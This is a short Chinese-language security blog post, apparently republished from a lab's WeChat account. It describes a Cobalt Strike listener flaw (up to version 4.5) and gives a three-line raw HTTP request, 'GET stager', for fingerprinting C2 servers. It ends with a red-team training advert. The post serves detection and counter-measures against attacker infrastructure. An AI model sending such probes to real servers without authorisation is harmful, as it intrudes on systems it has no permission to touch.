首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CS反制-CS服务器新特征

CS反制-CS服务器新特征

作者头像
Gamma实验室
发布2022-03-29 16:57:19
8730
发布2022-03-29 16:57:19
举报
文章被收录于专栏:Gamma安全实验室Gamma安全实验室

CobaltStrike是一款基于Java编写的全平台多方协同后渗透攻击框架,几乎覆盖了APT攻击链中所需要用到的各个技术环节。

基本描述

CobaltStrike的HTTP(S)监听器对请求URL未进行"/"开头验证,攻击者可通过指定URL获取相关信息。

有效载荷

GET stager HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0

测试过程

影响范围

CobaltStrike <= 4.5

该特征已申请了CVE!

最后

HW临近,公众号经常有人留言,希望有培训的机会,最近Gamma实验室核心成员商量组织一场红队培训,其目的就是给需要提升的人一次进阶机会吧,本次红队培训是面向高阶的,我们不再讲什么web安全,我们直接讲高阶红队作战的体系,没有冗余内容,直击当代红队的作战的全套流程

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-03-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Gamma安全实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 基本描述
  • 有效载荷
  • 测试过程
  • 影响范围
  • 最后
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档